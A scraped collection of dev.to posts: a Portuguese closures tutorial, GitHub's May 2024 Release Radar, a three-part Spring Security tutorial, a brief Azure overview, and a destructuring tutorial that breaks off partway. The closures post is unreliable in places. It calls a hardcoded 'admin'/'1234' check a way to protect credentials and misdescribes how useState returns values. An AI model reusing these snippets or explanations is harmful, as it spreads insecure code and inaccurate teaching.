> Uma closure é a combinação de uma função com as referências ao estado que a circunda (o ambiente léxico). Em outras palavras, uma closure lhe dá acesso ao escopo de uma função externa a partir de uma função interna - MDN Web Docs.
Então uma closure é uma função que tem acesso ao escopo de uma função externa, mesmo depois que a função externa tenha sido executada e encerrada. Isso significa que a closure pode "lembrar" e acessar variáveis e argumentos de sua função externa, mesmo que essa função já tenha sido finalizada. Legal, né?
Resumindo, nada mais é que funções que se apropriam do contexto de outras funções, no caso, funções definidas dentro do escopo de uma outra função e por isso possui acesso a variáveis e argumentos da função pai, mesmo que essa função já tenha sido finalizada. (diz aí se não são canibais 😶)
Vamos a um exemplo:
```javascript
function createAdder(X) {
return function(Y) {
return X + Y;
}
}
const addFive = createAdder(5);
console.log(addFive(10)); // Output: 15
```
Olhando esse código pela primeira vez pode parecer confuso, afinal de contas, o que uma função está fazendo dentro da outra? E gente, pra quê raios eu preciso retornar a função que eu declarei lá dentro? 🤯 ... Calma pessoal, prometo que tentarei explicar da melhor forma possível, bora lá.
Neste exemplo, `createAdder` é uma função que recebe um número `X` como argumento e retorna uma nova função que soma `X `com um segundo argumento `Y`. Então, criamos uma nova função `addFive` usando `createAdder(5)`. Essa nova função recebe um número `Y` como argumento e retorna a soma de `X + Y`. Quando chamamos `addFive(10)`, a função interna usa a referência a `X` mantida em sua closure para somar `X = 5` com `Y = 10`, retornando 15.
Observe que, mesmo que a função `createAdder` tenha concluído sua execução, a função interna retornada ainda tem acesso à variável `X` definida no escopo da função externa. Isso ocorre porque a função interna é uma closure que "lembra" o ambiente em que foi criada, incluindo todas as variáveis e funções disponíveis naquele ambiente.
### Tá, mas pra que isso serve? 😐
Além das utilidades que já mencionamos, closures podem ajudar a deixar seu código mais modular e organizado. Elas permitem que você crie funções com comportamentos específicos sem ter que duplicar código, e também ajudam a manter a privacidade de variáveis que não devem ser acessadas diretamente.
Por exemplo, vamos supor que você esteja criando um aplicativo de login com JavaScript e queira criar uma função que verifique se o nome de usuário e a senha estão corretos. Você pode criar uma função de verificação interna que mantém referências às credenciais do usuário como uma closure, impedindo que outras partes do código acessem essas credenciais diretamente:
```javascript
function createLoginChecker(username, password) {
return function() {
return username === "admin" && password === "1234";
}
}
const checkLogin = createLoginChecker("admin", "1234")
console.log(checkLogin()); // Output: true
```
Observe que a função `createLoginChecker` retorna uma função interna que verifica se o nome de usuário e a senha correspondem às credenciais armazenadas em suas variáveis. A função interna é uma closure que "lembra" as credenciais do usuário e as verifica toda vez que a função é chamada. Isso permite que você crie funções privadas que não podem ser acessadas por outras partes do código.
Outra vantagem das closures é que elas podem ser usadas para criar funções que retêm estados. Por exemplo, suponha que você esteja criando um aplicativo que deve rastrear quantas vezes um usuário clicou em um botão. Você pode criar uma função que retém o estado do contador interno como uma closure:
```javascript
function createClickCounter() {
let count = 0;
return function() {
count++;
console.log(`Button clicked ${count} times`);
}
}
const clickHandler = createClickCounter();
// Chamando a função 3 vezes
clickHandler(); // Output: Button clicked 1 times
clickHandler(); // Output: Button clicked 2 times
clickHandler(); // Output: Button clicked 3 times
```
Neste exemplo, a função `createClickCounter` retorna uma função interna que mantém o estado do contador `count`. Cada vez que a função interna é chamada, ela incrementa o contador e registra uma mensagem no console. A closure permite que a função interna mantenha o estado do contador entre as chamadas, permitindo que você rastreie quantas vezes o botão foi clicado.
### Ok, mas onde posso ver isso sendo utilizado mundo a fora?
Legal até agora apresentamos exemplos ficticios, mas que tal olhar algum framework famoso que utiliza de closures? ... Aleatoriamente peguei um exemplo do nosso querido ReactJs de uma das funções mais populares `useState`.
```javascript
export function useState<S>(
initialState: (() => S) | S,
): [S, Dispatch<BasicStateAction<S>>] {
const dispatcher = resolveDispatcher();
return dispatcher.useState(initialState);
}
```
Font - [ReactJs](https://github.com/facebook/react/blob/main/packages/react/src/ReactHooks.js#L99)
### OK, mas useState não é uma Closure 🤨
A função `useState` não é considerada um closure por si só, isso é um fato, porém ela pode retornar uma closure como resultado da chamada da função `useState` retornada pelo `dispatcher`. (te peguei nessa heimmm 😏)
Ela é usada para criar um estado interno em componentes React. A implementação da função usa um closure para armazenar o valor atual do estado, bem como uma função para atualizá-lo. A função retornada por `useState` é uma closure que pode ser usada para atualizar o valor do estado interno.
Veja, ao chamar a função `useState` do `dispatcher`, que é retornada pela função `useState` do módulo React, uma closure é criada e ela captura o valor atual do estado e a função para atualizar o estado. Essa closure é retornada pelo `useState` do módulo React como o primeiro elemento do array retornado. A closure é uma função que tem acesso à variável `state` e à função `setState` definida dentro do escopo da função `useState`.
Bora para o exemplo:
```javascript
function Counter() {
const [count, setCount] = useState(0);
function handleClick() {
setCount(count + 1);
}
return (
<div>
<p>You clicked {count} times</p>
<button onClick={handleClick}>
Click me
</button>
</div>
);
}
```
Observe que a função `useState` é chamada com o valor inicial de 0, e retorna uma closure que captura o valor atual de count e a função `setCount`. A closure é atribuída a `count` e `setCount`, permitindo que a função `handleClick` atualize o valor de count usando a função de atualização retornada pela closure.
Dessa forma, a função `useState` retorna uma closure que permite que o estado seja atualizado através da função de atualização capturada pela closure. A closure é criada dentro da função `useState`, e captura o valor atual do estado e a função para atualizá-lo, permitindo que a closure tenha acesso ao escopo em que foi criada e possa atualizar o estado de forma segura.

### Finalmente, bora pro resumo
Na prática o que uma Closure faz é criar uma associação de informações com uma função que trabalha essas informações.
Apesar de estar ligada com programação funcional, isso tem também a ver com paradigma de orientação a objeto, onde as informações e métodos trabalham juntos, com isso você consegue explorar o escopo e o contexto das funções, isso deixa ainda mais claro como aplicar alguns design patterns como Strategy e a Inversão de dependência, além de criação de eventos e callbacks.
E aí, curtiu aprender sobre closures? Espero que sim! Agora que você sabe o que são closures, para que servem e como utilizá-las, é hora de colocar esse conhecimento em prática nos seus projetos. Boa sorte e até a próxima. 🤗
| taisesoares |
1,878,723 | Release Radar · May 2024: Major updates from the open source community | While the Northern Hemisphere springs into a fresh era 🌷, the Southern says goodbye to Fall (or... | 17,046 | 2024-06-06T23:56:26 | https://dev.to/github/release-radar-may-2024-edition-major-updates-from-the-open-source-community-4oj3 | github, community, news, developers | While the Northern Hemisphere springs into a fresh era 🌷, the Southern says goodbye to Fall (or Autumn as we say Down Under 🍂). As the seasons change, our developers are changing, updating, and shipping their projects. There are a tonne of great projects featured here, everything from weekend hobbies, to world changing technology. Let's take a look at our staff picks for this month's Release Radar; a roundup of the open source projects that have shipped major version updates.
## Angular 18.0
Those building mobile and desktop web applications might be familiar with [Angular](https://github.com/angular/angular), a development platform for building using TypeScript, JavaScript, and other languages. The latest release brings a new home for [Angular Developers with their new website](https://angular.dev/), experimental support for zoneless change detection, lots of server-side rendering improvements, more stable controls, and lots more. Check out all the changes and what these mean for Angular devs on the [Angular blog post](https://blog.angular.dev/angular-v18-is-now-available-e79d5ac0affe).
{% youtube DK8M-ZFjaMw %}
## Web Check 1.0
Looking for comprehensive, on-demand intelligence for any website? Look no further than [Web Check](https://github.com/Lissy93/web-check). With [Web Check](https://web-check.xyz/), you can see insights for any website, uncover potential attack vectors, analyse server architecture, view security configurations, and see what technologies drive a particular site. Congrats on shipping out the first major version 🥳.

## Apache Skywalking 10.0
Are you working on microservices, cloud native, and container-based architectures? Then you need to check out [Apache Skywalking](https://skywalking.apache.org/). It's an Application Performance Monitoring (APM) system, that provides monitoring, tracing, and diagnosing capabilities for distributed systems in Cloud Native architectures. This latest update has hundreds of changes including support for Java 21 runtime, new functions and parameters, the addition of Golang as a supported language for AMQP, Kafka, RocketMQ, and Pulsar, support for multiple labels in metrics, and tonnes more. [Check out all changes in the very comprehensive release notes](https://github.com/apache/skywalking/releases/tag/v10.0.0). All the Apache Skywalking metrics are available via Grafana.

## Grafana 11.0
Speaking of metrics and Grafana, this popular project gets a major update too. As shown in the image above, Grafana is a data visualisation and composable observability platform. With Grafana you can query, visualise, alert on, and understand your metrics wherever that data may sit. The latest update adds lots of new features and enhancements such as a slightly refreshed UI, reducing the set of fields that could trigger an alert state change, the removal of Loki's API restrictions on resource calls, and lots more. Check out all the [changes in the changelog](https://github.com/grafana/grafana/releases/tag/v11.0.0).

## Tasmota 14.0
Firmware and embedded systems engineers will love this project; Tasmota is firmware for ESP8266 and ESP32 based devices that allows you to more easily configure your devices. The catch with this new update is that direct migration for versions earlier than 8.1 are no longer supported. If you're using anything higher, you can directly migrate to this latest version. Tasmota 14.0 adds a bunch of new commands, support for new hardware such as temperature and pressure sensors, and lots more. Read up on all the new devices, modules, and how to migrate in the [Tasmota release notes](https://github.com/arendst/Tasmota/releases/tag/v14.0.0).
{% github arendst/Tasmota %}
## croc 10.0
Do you have more than one computer? Ever had 'fun' trying to get files from one computer to the other? [Croc](https://github.com/schollz/croc) is here to save you. This CLI tool allows any two computers to securely transfer files and folders. You can transfer multiple files, including cross-platform (Windows, Linux, Mac), and you can use a proxy. The newest version of [croc](https://schollz.com/tinker/croc6/) has a few of the usual :bug: fixes and has a new way to define ports.

## ρμ 4.0
Pronounced rho mu, [ρμ](https://github.com/cicirello/rho-mu) is a Java library of randomization enhancements and other math utilities. In this latest update, [ρμ](https://rho-mu.cicirello.org/) makes improvements to the generation of random pairs and triples of distinct integers, adds support for generating streams of random pairs and triples of distinct integers, adds methods for efficiently shuffling arrays and lists, removes a couple of previously deprecated classes, and includes some improvements to internal library code. Check out the [changelog](https://github.com/cicirello/rho-mu/blob/main/CHANGELOG.md) for all the updates.
{% github cicirello/rho-mu %}
## Social Switch 1.0
Have you ever tried to share a social media post, and your friend on the other end can't see it because they don't have an account for that particular platform? Or maybe you want to look at a post and remain anonymous, [Social Switch](https://github.com/claromes/socialswitch) is here for you. Available as a Chrome, Firefox, or Firefox for Android extension, Social Switch allows you to share social media links from Instagram and TikTok URLs and users don't need to reveal their identity or log into their accounts. Congrats to the team on shipping your very first version 🥳.

## Simple Icons 12.0
Having [featured Simple Icons in the past](https://github.blog/2020-12-07-release-radar-dec-2020/), this project continues to make updates. [Simple Icons](https://github.com/simple-icons/simple-icons) now has over 3100 free SVG icons for all your favourite brands. The latest update provides more than a dozen new icons, and some revamped icons too. Check them all out and download them for your projects via the [Simple Icons website](https://simpleicons.org/).

## NetBox 4.0
If you're a network engineer, then you need to know about [NetBox](https://netboxlabs.com/oss/netbox/). It exists to empower you, and provides an accessible data model for all things networked. There's a single robust user interface and programmable APIs for everything from cable maps to device configurations. This latest update changes the format for GraphQL queries, a completely refreshed UI, support for dynamic REST API fields, and lots more. [Read up on all the breaking changes and dig into the migration guide](https://github.com/netbox-community/netbox/releases/tag/v4.0.0) to ensure you're up to date and compatible.

## Release Radar May 2024
Well, that’s all for this edition. Thank you to everyone who submitted a project to be featured :pray:. We loved reading about the great things you're all working on. Whether your project was featured here or not, congratulations to everyone who shipped a new release :tada:, regardless of whether you shipped your project's first version, or you launched 18.0.
If you missed our last Release Radar, check out the amazing open source projects that released major version projects in [April](https://dev.to/github/release-radar-april-2024-edition-major-updates-from-the-open-source-community-37k1). We love featuring projects submitted by the community. If you're working on an open source project and shipping a major version soon, we'd love to hear from you. Check out the [Release Radar repository](https://releaseradar.github.com/), and [submit your project to be featured in the GitHub Release Radar](https://github.com/github/release-radar/issues/new?assignees=MishManners&labels=&template=release-radar-request.yml&title=%5BRelease+Radar+Request%5D+%3Ctitle%3E).
| mishmanners |
1,879,568 | Spring Security Basics: Implementing Authentication and Authorization-PART 4 | Integrate the database with Spring Security Up to this point, we have used the default... | 0 | 2024-06-06T23:55:00 | https://dev.to/bytegrapher/spring-security-basics-implementing-authentication-and-authorization-part-4-1830 | ## Integrate the database with Spring Security
Up to this point, we have used the default user provided by Spring Security to log in to the application. In the previous sections, we added some sample users to the `application_users` table. Moving forward, we will use this table for logging in to the application. To achieve this, we need to configure Spring Security to recognize that the details of the application users are stored in the `application_users` table. This will enable Spring Security to retrieve and verify user credentials during authentication and authorization.
For that let's do the following steps:
1. Add the password encoder bean
2. Update the plain text password to encrypted password
3. Configure user details service
4. Configure the authentication provider
### Add the password encoder bean
In the `SecurityConfig` class add a bean of type `PasswordEncoder`
```java
package com.gintophilip.springauth.web;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.security.config.Customizer;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder;
import org.springframework.security.crypto.password.PasswordEncoder;
import org.springframework.security.web.SecurityFilterChain;
@Configuration
@EnableWebSecurity
public class SecurityConfig {
@Bean
public SecurityFilterChain securityFilterChain(HttpSecurity securityConfig) throws Exception {
return securityConfig
.authorizeHttpRequests(auth->
auth.requestMatchers("/api/hello")
.permitAll()
.requestMatchers("/api/admin").hasRole("ADMIN")
.anyRequest().authenticated()
).formLogin(Customizer.withDefaults())
.build();
}
@Bean
public PasswordEncoder passwordEncoder(){
return new BCryptPasswordEncoder();
}
}
```
The `BCryptPasswordEncoder` is the preferred method for encoding passwords.
### Update the plain text password to encrypted password.
While creating the sample users, the passwords were stored as plain text. In this step, let's update the passwords to an encrypted form.
>You may wonder why user creation is handled in this manner and not through an API. The reason is, to minimize the overhead of creating APIs for every function. The primary goal of this article is to demonstrate the fundamentals of integrating authentication and authorization mechanisms.
1. Drop the `user_roles` table
2. Drop the `roles` table
3. Drop the `application_user` table
4. Add the `PasswordEncoder` class dependency in `DataBaseUtilityRunner`
5. Encode the password
**Drop the**`user_roles`**table**
```bash
spring_access_db=# drop table user_roles;
```
**Drop the**`roles`**table**
```bash
spring_access_db=# drop table roles;
```
**Drop the**`application_user`**table**
```bash
spring_access_db=# drop table application_user;
```
>The drop tables command were executed via psql CLI
And also, do the following in `DataBaseUtilityRunner` class.
*update the lines*
```java
user1.setPassword("123456");
adminUser.setPassword("12345");
```
as follows.
```java
user1.setPassword(passwordEncoder.encode("123456"));
adminUser.setPassword(passwordEncoder.encode("12345"));
```
The `DataBaseUtilityRunner` after modification is as follows,
```java
package com.gintophilip.springauth;
import com.gintophilip.springauth.entities.ApplicationUser;
import com.gintophilip.springauth.entities.Roles;
import com.gintophilip.springauth.repository.RoleRepository;
import com.gintophilip.springauth.repository.UserRepository;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.boot.CommandLineRunner;
import org.springframework.security.crypto.password.PasswordEncoder;
import org.springframework.stereotype.Component;
@Component
public class DataBaseUtilityRunner implements CommandLineRunner {
@Autowired
PasswordEncoder passwordEncoder;
@Autowired
UserRepository usersRepository;
@Autowired
RoleRepository rolesRepository;
@Override
public void run(String... args) throws Exception {
try {
Roles userRole = new Roles();
userRole.setRoleName("USER");
Roles adminRole = new Roles();
adminRole.setRoleName("ADMIN");
rolesRepository.save(userRole);
rolesRepository.save(adminRole);
ApplicationUser user1 = new ApplicationUser();
user1.setFirstName("John");
user1.setEmail("john@test.com");
user1.setPassword(passwordEncoder.encode("123456"));
user1.setRole(userRole);
ApplicationUser adminUser = new ApplicationUser();
adminUser.setFirstName("sam");
adminUser.setEmail("sam@test.com");
adminUser.setPassword(passwordEncoder.encode("12345"));
adminUser.setRole(adminRole);
usersRepository.save(user1);
usersRepository.save(adminUser);
}catch (Exception exception){
}
}
}
```
Run the application and query the `application_user` table. You will see the passwords are encoded now instead of plain text.
```bash
spring_access_db=# select * from application_user;
id | email | first_name | last_name | password
-----+---------------+------------+-----------+--------------------------------------------------------------
102 | john@test.com | John | | $2a$10$IBP9g8pOvNCvkEc7/EG6TO3j6gh49QMuO6uuw9Dd/P9dPRi5mxbiAsnG
103 | sam@test.com | sam | | $2a$10$WxM0l4qnjbYn1Vkgmrbte.hgYqPyHLm/y.9IGvEoiRkrL8.h47QKu
(2 rows)
```
### Configure user details service
For making spring security to use the database for authentication and authorization a user details service needs to be implemented. This is nothing but a class which implements the interface `UserDetailsService` .
This interface has a method named `loadUserByUsername` which accepts a string parameter and returns a `UserDetails` object.
```java
package org.springframework.security.core.userdetails;
public interface UserDetailsService {
UserDetails loadUserByUsername(String username) throws UsernameNotFoundException;
}
```
Create a class named `DatabaseUserDetailsService.java` which implements the `UserDetailsService` interface.
```java
public class DatabaseUserDetailsService implements UserDetailsService {
@Override
public UserDetails loadUserByUsername(String username) throws UsernameNotFoundException {
return null;
}
}
```
In the overridden method we do the following
1. Fetch the user from database based on the parameter username.
2. Retrieve the roles associated with the user
3. Create an instance of class `User` with the user details and the associated roles
4. Return the `User` object
```java
package com.gintophilip.springauth.service;
import com.gintophilip.springauth.entities.ApplicationUser;
import com.gintophilip.springauth.repository.UserRepository;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.security.core.GrantedAuthority;
import org.springframework.security.core.authority.SimpleGrantedAuthority;
import org.springframework.security.core.userdetails.User;
import org.springframework.security.core.userdetails.UserDetails;
import org.springframework.security.core.userdetails.UserDetailsService;
import org.springframework.security.core.userdetails.UsernameNotFoundException;
import org.springframework.stereotype.Service;
import java.util.Collections;
@Service
public class DatabaseUserDetailsService implements UserDetailsService {
@Autowired
UserRepository userRepository;
@Override
public UserDetails loadUserByUsername(String username) throws UsernameNotFoundException {
ApplicationUser user = userRepository.findByEmail(username); //fetch user from db
if(user == null){
throw new UsernameNotFoundException("User Not found");
}
//Retrieve user roles
GrantedAuthority authority = new SimpleGrantedAuthority("ROLE_"+user.getRole().getRoleName());
//create User object
User applicationUser = new User(user.getEmail(),user.getPassword(), Collections.singleton(authority));
return applicationUser;
}
}
```
>The <code>User</code> class implements the <code>UserDetails</code> interface. Spring utilizes the <code>UserDetails</code> to generate an Authentication object. This Authentication object indicates whether the user is authenticated.
Next we need to configure an authentication provider.
### Configure the authentication provider
For Spring Security to utilize the `DatabaseUserDetailsService` for retrieving user details, it must be linked with an authentication provider. For that we will create a bean of type `DaoAuthenticationProvider` in the `SecurityConfig` and bind it with `DatabaseUserDetailsService` within the `SecurityConfig`.
Bind the `DatabaseUserDetailsService`
```java
@Autowired
DatabaseUserDetailsService databaseUserDetailsService;
```
Next, create an instance of `DaoAuthenticationProvider` which is an implementation of `AUthenticationProvider` given by Spring security. Then,
1. Link the `databaseUserDetailsService`
2. Link the `passwordEncoder`
```java
@Bean
public DaoAuthenticationProvider daoAuthenticationProvider() {
DaoAuthenticationProvider authenticationProvider = new DaoAuthenticationProvider();
//set the user details object
authenticationProvider.setUserDetailsService(databaseUserDetailsService);
//set the password encoder
authenticationProvider.setPasswordEncoder(passwordEncoder());
return authenticationProvider;
}
```
After this the `SecurityConfig` looks like below.
```java
package com.gintophilip.springauth.web;
import com.gintophilip.springauth.service.DatabaseUserDetailsService;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.security.authentication.dao.DaoAuthenticationProvider;
import org.springframework.security.config.Customizer;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder;
import org.springframework.security.crypto.password.PasswordEncoder;
import org.springframework.security.web.SecurityFilterChain;
@Configuration
@EnableWebSecurity
public class SecurityConfig {
@Autowired
DatabaseUserDetailsService databaseUserDetailsService;
@Bean
public SecurityFilterChain securityFilterChain(HttpSecurity securityConfig) throws Exception {
return securityConfig
.authorizeHttpRequests(auth->
auth.requestMatchers("/api/hello")
.permitAll()
.requestMatchers("/api/admin").hasRole("ADMIN")
.anyRequest().authenticated()
).formLogin(Customizer.withDefaults())
.build();
}
@Bean
public PasswordEncoder passwordEncoder(){
return new BCryptPasswordEncoder();
}
@Bean
public DaoAuthenticationProvider daoAuthenticationProvider() {
DaoAuthenticationProvider authenticationProvider = new DaoAuthenticationProvider();
//set the user details object
authenticationProvider.setUserDetailsService(databaseUserDetailsService);
//set the password encoder
authenticationProvider.setPasswordEncoder(passwordEncoder());
return authenticationProvider;
}
}
```
Next, run the application and access the APIs. When the login page appears, use the user details from the `application_user` table.
1. [http://localhost:8080/api/hello](http://localhost:8080/api/hello)
2. [http://localhost:8080/api/protected](http://localhost:8080/api/protected)
3. [http://localhost:8080/api/admin](http://localhost:8080/api/admin)
You will be successfully authenticated and able to view the response.
The `/api/admin` is only accessible to the user ***sam***.
--- | bytegrapher | |
1,878,588 | CORE ARCHITECTURAL COMPONENTS OF AZURE | Azure is Microsoft's Cloud computing platform. It offers a wide range of services including... | 0 | 2024-06-06T23:50:41 | https://dev.to/preskoya/core-architectural-components-of-azure-290n |
Azure is Microsoft's Cloud computing platform.
It offers a wide range of services including computing, analytics, storage and networking.
Azure infrastructures are spread across the globe in different REGIONS targeting markets with high demand.
Each Region is divided into a minimum of 3 AVAILABILITY ZONES. This arrangement increases Fault Tolerance and reduces Redundancy.
An Availability Zone is made up of one or more datacenters equipped with independent power, cooling and networking infrastructure.
The networking infrastructures are interconnected through high speed fibre optic cables.
Resource Groups and ARM
Resources are managed and organized in Resource Groups through ARM-Azure Resource Manager.
Azure supports a wide range of services
1. Infrastructure as a service, IaaS
2. Platform as a service, PaaS
3. Software as a service, SaaS | preskoya | |
1,879,560 | Spring Security Basics: Implementing Authentication and Authorization-PART 3 | Configuring security of the API end points In this section, to configure the security of... | 0 | 2024-06-06T23:47:00 | https://blog.gintophilip.com/part-3-configuring-security-of-the-api-end-points | springboot, springsecurity, java, backend | ## Configuring security of the API end points
In this section, to configure the security of the API end points a custom security configuration needs to be created. To achieve this let's go through the following steps.
1. Create the security configuration class
2. Make all APIs to be accessed only by logged in users
3. Allow /api/hello to be accessed by anyone
4. Restrict access to /api/admin to user with ADMIN role only
Access to the end points will be configured as follows.
| API | Who can access |
| --- | --- |
| api/hello | anyone |
| api/protected | authenticated users |
| api/admin | admin user |
### Create the security configuration class
To implement a custom security configuration by overriding the default one we need to create a configuration class. This can be done with the help of `@Configuration` annotation.
```java
package com.gintophilip.springauth.web;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.security.config.Customizer;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
import org.springframework.security.web.SecurityFilterChain;
@Configuration
@EnableWebSecurity
public class SecurityConfig {
@Bean
public SecurityFilterChain securityFilterChain(HttpSecurity securityConfig) throws Exception {
return securityConfig
.authorizeHttpRequests(auth->
auth.anyRequest().authenticated()
).formLogin(Customizer.withDefaults())
.build();
}
}
```
This will serve as our initial configuration. Here, we have mandated that every request must be authenticated. In the coming steps, we will configure the security settings as required.
>For logging in use the default user created by the Spring Security.
### Make all APIs to be accessed only by logged in users
There is nothing to do. Because the initial configuration we created satisfied the requirement. Hence we don't need to specify any special configuration for the API endpoint `/api/protected`
### Allow `/api/hello` to be accessed by anyone
```java
@Bean
public SecurityFilterChain securityFilterChain(HttpSecurity securityConfig) throws Exception {
return securityConfig
.authorizeHttpRequests(auth->
auth.requestMatchers("/api/hello").permitAll().
anyRequest().authenticated()
).formLogin(Customizer.withDefaults())
.build();
}
```
Now run the application and attempt to access the APIs. The endpoint `/api/hello` is now accessible to everyone, while all other endpoints still require users to log in.
### Restrict access to `/api/admin` to user with the ADMIN role only.
```java
@Bean
public SecurityFilterChain securityFilterChain(HttpSecurity securityConfig) throws Exception {
return securityConfig
.authorizeHttpRequests(auth->
auth.requestMatchers("/api/hello")
.permitAll()
.requestMatchers("/api/admin").hasRole("ADMIN")
.anyRequest().authenticated()
).formLogin(Customizer.withDefaults())
.build();
}
```
At this point, the only API endpoint accessible to users is `/api/hello`. All other endpoints are restricted by a login screen.
https://blog.gintophilip.com/series/spring-security-authentication-and-authorization
--- | bytegrapher |
1,879,556 | Spring Security Basics: Implementing Authentication and Authorization-PART 2 | Enable Spring Security In the previous section, we built a foundational application. In... | 0 | 2024-06-06T23:45:00 | https://dev.to/bytegrapher/spring-security-basics-implementing-authentication-and-authorization-part-2-3b6l | ## Enable Spring Security
In the previous section, we built a foundational application. In this section, we will enable Spring Security in the application. For that let's do the following steps:
1. Add the Spring Security dependency
2. Restart the application
3. Verify Spring Security is enabled
### Add the Spring Security dependency
To Enable spring security the library `org.springframework.boot:spring-boot-starter-security` must be present in the Classpath. This can be achieved by adding the library as a dependency in the `build.gradle` file. Note the first item in the dependencies list
```plaintext
dependencies {
implementation 'org.springframework.boot:spring-boot-starter-security'
implementation 'org.springframework.boot:spring-boot-starter-data-jpa'
implementation 'org.springframework.boot:spring-boot-starter-web'
runtimeOnly 'com.h2database:h2'
testImplementation 'org.springframework.boot:spring-boot-starter-test'
}
```
### Restart the application
Just restart the application. Then go to the next step.
### Verify Spring Security is enabled
Open the browser and attempt to access the API endpoints. If a login page appears for each endpoint you try to access, it confirms that Spring Security is enabled and functioning as expected.

Yeah that's it.
At this point the application is running with the default implementation of Spring Security. You will not able to access the APIs without entering login credentials. In the default implementation, Spring Security provides a default user with username as **“user”** and a randomly generated password . This generated password can be obtained from the console logs.

Note the line ***Using generated security password: dd05314d-2856-48b4-9c81-fcc480e0b4bf***
The default behavior of Spring Security, unless configured otherwise is as follows:
* All end points are protected by default when the library `org.springframework.boot:spring-boot-starter-security` is present in the Classpath
* One cannot access the resources without authentication.
* Provides a default user that can be overridden.
In this default setup the APIs can be accessed by entering the username as **user** and password as the one which is printed in the console. Try accessing the APIs by entering the default credentials.
1. [http://localhost:8080/api/hello](http://localhost:8080/api/hello)
2. [http://localhost:8080/api/protected](http://localhost:8080/api/protected)
3. [http://localhost:8080/api/admin](http://localhost:8080/api/admin)
--- | bytegrapher | |
1,868,022 | Desestruturação com Javascript | Olá coders! 😁 Hoje eu vou falar um pouco sobre desestruturação em javascript, espero que gostem do... | 0 | 2024-06-06T23:38:09 | https://dev.to/tassiomed/desestruturacao-com-javascript-4nij | webdev, javascript, beginners, programming | Olá coders! 😁 Hoje eu vou falar um pouco sobre desestruturação em javascript, espero que gostem do que vem a seguir. Este é um artigo bem básico para quem quer relembrar ou visualizar rapidamente o conceito, nada muito aprofundado.
A desestruturação é um recurso que foi adicionado no Javascript ES6, como o próprio nome diz, ela **permite desestruturar algo, de forma mais simples, retirando o que precisamos, ou “desembalando”**. Podemos usa-la para remover elementos de arrays e objetos, de forma bem direta. É uma ótima opção para deixar o código limpo e enxuto. Ao decorrer do texto, vamos entender alguns tipos de desestruturação.
## Desestruturação Aninhada
```jsx
const Cachorro = {
nome: 'Bob',
raca: 'Vira-lara',
idade: 5,
dono: {
nomeDono: 'Tássio',
idadeDono: 26,
endereco: {
rua: 'Rua Daora',
numero: 234,
}
}
}
// Acessando os valores:
const idade = Cachorro.idade //5
const dono = Cachorro.dono.nomeDono // 'Tássio'
const idade = Cachorro.dono.endereco.rua // 'Rua Daora'
```
Observe o exemplo acima. É um objeto `Cachorro` e é com ele que vamos trabalhar ao longo do artigo. Veja que, para acessar os valores, é necessário replicar `Cachorro.` várias vezes .
```jsx
const {
nome,
raca,
idade,
dono: {
nomeDono,
idadeDono,
endereco: { rua, numero }
}
} = Cachorro;
// A desestruturação acima é equivalente a:
const nome = 'Bob';
const raca = 'Vira-lata';
const idade = 5;
const nomeDono = 'Tássio';
const idadeDono = 26;
const rua = 'Rua Daora';
const numero = 234;
```
Agora, com a aplicação da desestruturação, o processo é menos trabalhoso. As propriedades do objeto já são transformadas em variáveis diretamente, sem precisar usar `Cachorro.` repetidamente. Esse tipo de desestruturação é conhecida como **aninhada** pois lida com objetos ou arrays que contêm outros objetos ou arrays internos. Para extrair as propriedades é necessário “mergulhar”(ou “aninhar”) na estrutura.
## Desestruturação com Alias
```jsx
const {
nome: nomeCachorro,
raca: racaCachorro,
idade: idadeCachorro,
dono: {
nomeDono: nomeProprietario,
idadeDono: idadeProprietario,
endereco: { rua: ruaDono, numero: numeroCasa }
}
} = Cachorro;
// A desestruturação acima é equivalente a:
const nomeCachorro = 'Bob';
const racaCachorro = 'Vira-lata';
const idadeCachorro = 5;
const nomeProprietario = 'Tássio';
const idadeProprietario = 26;
const ruaDono = 'Rua Daora';
const numeroCasa = 234;
```
No código acima as variáveis foram renomeadas, mas os valores permanecem os mesmos. Essa é a desestruturação alias, bastante necessária quando queremos evitar conflitos de nomes no nosso projeto ou quando precisamos que nossas variáveis tenham nomes mais significativos que se encaixem com o contexto.
Observe que `nomeCachorro` é uma nova variável que armazena o valor da propriedade `nome` do objeto `Cachorro`. É importante ressaltar que `nomeCachorro` não altera nem substitui a propriedade `nome` no objeto `Cachorro`. A desestruturação cria novas variáveis (com nomes diferentes) para os valores das propriedades, mas o objeto original permanece inalterado.
Tenho falado aqui sobre a Desestruturação Alias, mas por que o nome é “Alias”? 🤔
Bem, se você for traduzir do inglês para o português, **“alias” significa “apelido”, ou seja, estamos criando apelidos para as propriedas do objeto.**
## Desestruturação Rest/Spread
### Rest (`...`)
```jsx
const { nome, raca, ...resto } = Cachorro;
// A desestruturação acima é equivalente a:
const nome = 'Bob';
const raca = 'Vira-lata';
const resto = {
idade: 5,
dono: {
nomeDono: 'Tássio',
idadeDono: 26,
endereco: {
rua: 'Rua Daora',
numero: 234
}
}
};
```
No exemplo acima `nome` e `raca` foram desestruturados e armazenados em variáveis separadas, já `resto` é um novo objeto que contém todas as outras propriedades do objeto `Cachorro`. **É isso que o operador rest permite fazer: capturar o resto das propriedas de um objeto ou elementos de um array que não foram desestruturados.**
**Abaixo um exemplo com array:**
```jsx
const numeracao = [1, 10, 100, 1000, 10000];
const [unidade, dezena, ...resto] = numeracao;
console.log(unidade); // 1
console.log(dezena); // 10
console.log(resto); // [100, 1000, 10000]
```
Em `unidade` e `dezena` pegamos dois primeiros elementos do array `numeracao`, e o `resto` é um novo array que contém todos os elementos restantes.
### Spread (`...`)
